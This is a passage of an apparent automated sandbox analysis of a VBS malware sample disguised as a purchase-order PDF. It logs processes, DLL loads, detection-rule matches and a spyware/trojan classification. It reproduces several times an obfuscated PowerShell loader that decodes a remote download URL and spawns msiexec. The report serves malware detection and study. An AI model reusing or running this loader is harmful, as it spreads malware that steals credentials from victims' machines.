uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D9B276 2_2_00007FF848D9B276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D9C022 2_2_00007FF848D9C022
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02CCF320 5_2_02CCF320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02CCFBF0 5_2_02CCFBF0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BBF2BF 7_3_00BBF2BF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC0E93 7_3_00BC0E93
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC468F 7_3_00BC468F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC4782 7_3_00BC4782
Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6878
Source: unknown Process created: Commandline size = 6878
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6878 Jump to behavior
Source: amsi32_5588.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Tavell.Vrd Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziide4ti.rqg.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5972
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5588
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msiexec.exe, 00000007.00000003.2459414589.0000000021E55000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs Virustotal: Detection: 12%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
